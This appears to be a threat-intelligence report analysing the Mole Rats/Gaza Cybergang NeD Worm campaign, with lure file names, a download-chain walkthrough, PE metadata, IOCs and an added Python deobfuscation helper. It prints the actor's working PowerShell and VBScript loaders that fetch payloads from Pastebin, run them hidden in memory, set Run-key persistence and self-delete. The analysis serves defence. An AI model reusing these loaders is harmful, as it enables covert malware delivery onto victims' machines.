Operation JOKAA(RR)
Follow Up to Operation Desert Eagle
OSI Actor: Mole Rats / Gaza Cybergang



EXECUTIVE SUMMARY

Operation JOKAA(RR) looks into the continued activities of the Mole Rats/Gaza Cybergang threat actor and their new TTPs. This report builds on their previous activities as documented in:

Operation Desert Eagle (Malware_Party)

Gaza Cybergang (Kaspersky SecureList)

Operation Dusty Sky (ClearSky Security)


Author
  • @MalwareParty


Targeting

File Names
The observed file names (Palestine/Hamas themed) give an indication of this threat actor's targeting and region.

File Name: محضر اجتماع الرئيس عباس مع وفد المخابرات المصرية.exe
Translated (Google): Minutes of the meeting of President Abbas with the Egyptian intelligence delegation

File Name: رد حركة حماس على ورقة المصالحة المصرية.exe
Translated (Google): Hamas' response to the Egyptian reconciliation paper

File Name: محضر اجتماع اللجنة التنفيذية لمنظمة التحرير الفلسطينية امس الاربعاء.exe
Translated (Google): Minutes of the meeting of the Executive Committee of the Palestine Liberation Organization (PLO) on Wednesday

File Name: محضر اجتماع على الهاتف بين رئيس المكتب السياسي لحركة حماس اسماعيل هنية ورئيس المخابرات المصرية.exe
Translated (Google): Minutes of a meeting on the phone between the head of the political bureau of Hamas Ismail Haniya and the head of Egyptian intelligence

File Name: تعميم خاص للسادة السفراء ..exe
Translated (Google): Special circular for Ambassadors ..

File Name: محضر اجتماع العمادي مع هنية رئيس حماس امس الاحد .exe
Translated (Google): Al - Emadi 's meeting minutes with Haniyeh, Hamas' president on Sunday - GameDownload.exe

File Name: محضر اجتماع سري جمع الرئيس عباس مع ماجد فرج.exe
Translated (Google): Minutes of a secret meeting between President Abbas and Majid Faraj

File Name: قرارات الرئيس عباس بخصوص العقوبات المالية في المحافظات الجنوبية.exe
Translated (Google): President Abbas' Decisions Regarding Financial Sanctions in the Southern Governorates

File Name: سبب الزيارة العاجلة ولقاء مع وفد دحلان.exe
Translated (Google): The reason for the urgent visit and meeting with the delegation of Dahlan

File Name: president abbas with Egyption intelligence.exe
Translated (Google): N/A

File Name: ما سيتم بحثه في اجتماع اللجنة التنفيذية الليلة .. وقرارات حاسمة.exe
Translated (Google): What will be discussed at the Executive Committee meeting tonight .. Decisive decisions

File Name: محضر مغلق حول إجتماع سيادة الرئيس حول التهدئة.exe
Translated (Google): Urgent and quick visit to our delegation to Cairo to discuss matters of substance

File Name: التسجيل الصوتي الأصلي.scr
Translated (Google): The Original Sound Recording






Dynamic Analysis

Sample Run-through
We will take a look at one of the samples listed above and walk through it. This will demonstrate their heavy use of Pastebin in the installation of their NeD Worm malware.


Sample: 

63afb94147b64c3e6e4add33b1153c3662a00ae73a745a975c939107db94fed0
محضر اجتماع سري جمع الرئيس عباس مع ماجد فرج.exe
Minutes of a secret meeting of President Abbas with Majed Faraj

1. After detonating the sample, there are 2 call-outs observed:

A. DNS Requests:

B. URL:
hxxps://upload[.]cat/b68f8a8e5810b6b7?download_token=e10ba4c15f…..
hxxps://dev-point[.]co/uploads1/8f70287802ec1.jpg


2.  The request for upload[.]cat returns 1.jpg (594b6c2826660c44b97e6ef2158f7143d6476f3d7d2a62a787e2b6e6320af413)



3. Once 1.jpg (really an executable) is run, it makes a request to hxxps://pastebin[.]com/raw/hR1iwmqb



A. Contents of hR1iwmqb:




B. Another request is made for hxxps://pastebin[.]com/raw/4YqrnhP9, which returns a base64 blob




4. The base64 blob is then appended to the hard-coded string “TVqQAAMAAAAEA” (for greater obfuscation: “TVqQ” is the base64 encoding of the “MZ” header bytes, so the paste on its own does not decode to a recognisable executable)


([Convert]::Frombase64String('T'+'V'+'q'+'Q'+'A'+'A'+'M'+'A'+'A'+'A'+'A'+'E'+'A'+(New-Object System.Net.WebClient).Downloadstring('https://pastebin.com/raw/4YqrnhP9')))



5. Once the base64 blob is decoded, it becomes an executable file (69fe00eca050b3a8555b30d75eca10697a330fb04021cd36f8d0379ba078f165)

This is the NeD Worm malware that is heavily used by Mole Rats/Gaza Cybergang.


A. Network traffic after running the NeD Worm Sample





B. checktest[.]www1[.]biz Analysis



JOKAA & JOKRR


Taking a closer look at the Pastebin users (JOKAA & JOKRR), we can see that the actor has been active at least from May 17th, 2018 to November 11th, 2018.














Looking at JOKRR’s Pastebin account, we can see the same download/obfuscation technique being used.
Examining https://pastebin.com/CQuDUFis, or “Sen0”, we can see the following:


1. Sen0

set Ob123123j0 = CreateObject("Wscr"&"ipt.Shell")
H="Power"&"Shell.exe -windowst"&"yle hidden -noexit [AppDomain]::CurrentDomain.Load([Convert]::Frombase64String('TVqQAAMAAAAEAAAA//8AALg'+(New-Object System.Net.WebClient).Downloadstring('https://pastebin.com/raw/RsGQfwhr'))).EntryPoint.invoke($null,$null)"
Ob123123j0.regwrite "HKCU\"&"Software\M"&"icrosoft\Windows\Curr"&"entVersion\R"&"un\Microt", H, "REG_"&"EXPAND_SZ"
Ob123123j0.Run H,0,false
Ob123123j0.Run "cmd.exe /c del " & ChrW(34) & Wscript.scriptfullname & ChrW(34),0,false



2. Base64 Blob




When combined, the following file is created: cb3f646bf0c6e8d2c57e85ac9f60f974
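As an added example (not part of the original report or the actor's code), the following Python collapses the string-splitting seen in both the PowerShell one-liner from the first sample and the Sen0 VBScript above, flags the behaviours an analyst would triage (hidden PowerShell, Run-key persistence, Pastebin raw URLs, the split MZ prefix, self-deletion), and rejoins a hard-coded MZ prefix with a paste blob to confirm the result starts with an MZ header. The paste ID is a placeholder and the payload is a constructed 64-byte DOS header, not the actor's binary.

```python
import base64
import re

# Constructed samples modelled on the pastes discussed above; paste IDs are a
# placeholder and the base64 payload is a fake 64-byte DOS header, not malware.
PS_LINE = ("[Convert]::Frombase64String('T'+'V'+'q'+'Q'+'A'+'A'+'M'+'A'+'A'+'A'+'A'+'E'+'A'"
           "+(New-Object System.Net.WebClient).Downloadstring('https://pastebin.com/raw/PLACEHOLDER'))")
SEN0_LIKE = (
    'set Ob123123j0 = CreateObject("Wscr"&"ipt.Shell")\n'
    'H="Power"&"Shell.exe -windowst"&"yle hidden -noexit [AppDomain]::CurrentDomain.Load('
    "[Convert]::Frombase64String('TVqQAAMAAAAEAAAA//8AALg'+(New-Object System.Net.WebClient)"
    ".Downloadstring('https://pastebin.com/raw/PLACEHOLDER'))).EntryPoint.invoke($null,$null)\"\n"
    'Ob123123j0.regwrite "HKCU\\"&"Software\\M"&"icrosoft\\Windows\\Curr"&"entVersion\\R"&"un\\Microt", H, "REG_"&"EXPAND_SZ"\n'
    'Ob123123j0.Run "cmd.exe /c del " & ChrW(34) & Wscript.scriptfullname & ChrW(34),0,false\n'
)

VB_CONCAT = re.compile(r'"([^"\n]*)"\s*&\s*"([^"\n]*)"')   # "Wscr"&"ipt.Shell"
PS_CONCAT = re.compile(r"'([^'\n]*)'\s*\+\s*'([^'\n]*)'")  # 'T'+'V'+'q'

def join_split_strings(script: str) -> str:
    """Collapse the string-splitting obfuscation until no adjacent literal pair is left."""
    prev = None
    while prev != script:
        prev = script
        script = VB_CONCAT.sub(lambda m: f'"{m.group(1)}{m.group(2)}"', script)
        script = PS_CONCAT.sub(lambda m: f"'{m.group(1)}{m.group(2)}'", script)
    return script

def script_indicators(script: str) -> dict:
    """Behaviours worth flagging once the literals are readable again."""
    plain = join_split_strings(script)
    return {
        "hidden_powershell": bool(re.search(r"powershell\.exe .*-windowstyle hidden", plain, re.I)),
        "run_key_persistence": bool(re.search(r"\\CurrentVersion\\Run\\", plain, re.I)),
        "mz_prefix_in_script": "Frombase64String('TVqQ" in plain,   # TVqQ = base64("MZ\x90")
        "pastebin_raw_urls": re.findall(r"https?://pastebin\.com/raw/\w+", plain),
        "self_delete": "cmd.exe /c del" in plain,
    }

def reassemble_payload(prefix_b64: str, pasted_b64: str) -> bytes:
    """Rejoin the MZ prefix kept in the script with the paste blob; refuse non-PE output."""
    data = base64.b64decode(prefix_b64 + pasted_b64)
    if data[:2] != b"MZ":
        raise ValueError("reassembled blob does not start with an MZ header")
    return data

# Standard DOS header bytes (what "TVqQAAMAAAAEAAAA//8AALg..." decodes to), padded with zeros.
FAKE_PE = bytes.fromhex("4d5a90000300000004000000ffff0000b800") + b"\x00" * 46
FULL_B64 = base64.b64encode(FAKE_PE).decode()
PASTE_BLOB = FULL_B64[len("TVqQAAMAAAAEAAAA//8AALg"):]  # the part the paste would carry
```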



Static Analysis


63afb94147b64c3e6e4add33b1153c3662a00ae73a745a975c939107db94fed0
محضر اجتماع سري جمع الرئيس عباس مع ماجد فرج.exe
Minutes of a secret meeting of President Abbas with Majed Faraj

  1. File Data:
size: 843264

exif:
PEType: PE32
FileTypeExtension: exe
FileSubtype: 0
FileModifyDate: 2018:11:14 14:09:27-05:00
InitializedDataSize: 199680
FileOS: Win32
FileDescription: 
MIMEType: application/octet-stream
FileVersionNumber: 1.1.26.1
ImageVersion: 0.0
InternalName: 
LinkerVersion: 10.0
EntryPoint: 0x902d3
FileFlagsMask: 0x0017
FileFlags: (none)
FileAccessDate: 2018:11:14 14:09:27-05:00
FileSize: 824 kB
ExifToolVersion: 10.13
TimeStamp: 2017:07:15 21:17:33-04:00
FileInodeChangeDate: 2018:11:14 14:09:27-05:00
CharacterSet: Unicode
FileVersion: 1.1.26.01
ObjectFileType: Executable application
UninitializedDataSize: 0
OSVersion: 5.0
MachineType: Intel 386 or later, and compatibles
ProductVersionNumber: 1.1.26.1
FileType: Win32 EXE
CodeSize: 642560
LegalCopyright: 
SubsystemVersion: 5.0
LanguageCode: English (U.S.)
ProductVersion: 1.1.26.01
Subsystem: Windows GUI
ProductName: 

cert:
source file not signed

peinfo: 
Portable Executable Information
Optional Header: 0x400000
Address Of Entry Point: 0x902d3
Required CPU type: IMAGE_FILE_MACHINE_I386
DLL: False
Subsystem: IMAGE_SUBSYSTEM_WINDOWS_GUI
Compile Time: 2017-07-15 21:17:33
Number of RVA and Sizes: 16
Number of Sections: 4

Section VirtualAddress VirtualSize SizeofRawData Entropy MD5
.text 0x1000 0x9cdd1 642560 6.62573962703 ed222528c0af141da47ff8a47c345c52
.rdata 0x9e000 0x23276 144384 4.83349152991 25f8d7882fc2a14d37f5ce858ebb9321
.data 0xc2000 0xa0b8 12800 3.9831618653 ace5eafa538405645cda58c972af5d6c
.rsrc 0xcd000 0xa4a8 42496 6.68424524085 795a4831c0ff1ccd453e35c918f82088

Imported DLLs:
WSOCK32.dll
WINMM.dll
VERSION.dll
COMCTL32.dll
PSAPI.DLL
KERNEL32.dll
USER32.dll
GDI32.dll
COMDLG32.dll
ADVAPI32.dll
SHELL32.dll
ole32.dll
OLEAUT32.dll

import_hash (all of the downloaders have the same import hash): cae167cd04ec2982fcdb300bc5300e29

links:
hxxps://dev-point[.]co/uploads1/8f70287802ec1.jpg,
hxxps://dev-point[.]co/uploads1/bf538abc25841.jpg,
hxxps://upload[.]cat/013c50d8db8f96c8?download_token=6a79073c5fa2d667b93dfc35ffbb3f50633c0a68895fd8abc7b7704e4b7a6ad1,
hxxps://upload[.]cat/2605ee706f79181a?download_token=6bd9689cdcf7409b09321375e240e87eb8a6f9799727334775b12293d2f467b2,
hxxps://upload[.]cat/2b18311779009229?download_token=376be0dbe979e6bc643466d52a60c11efd8e40f46cb5e80226341f840830c291,
hxxps://upload[.]cat/4e9aeb589dbe7fc5?download_token=bd084e7acc93a63f5cf8116209adc5755d383f0a0bbfb93d9eca123f8fae79a7,
hxxps://upload[.]cat/ee9a67e37167755e?download_token=ad5ce7fb9c69f2602ecffcc5932875ea1c07e51ff11172124d9a1bd5c75dfaf8,


IOCs
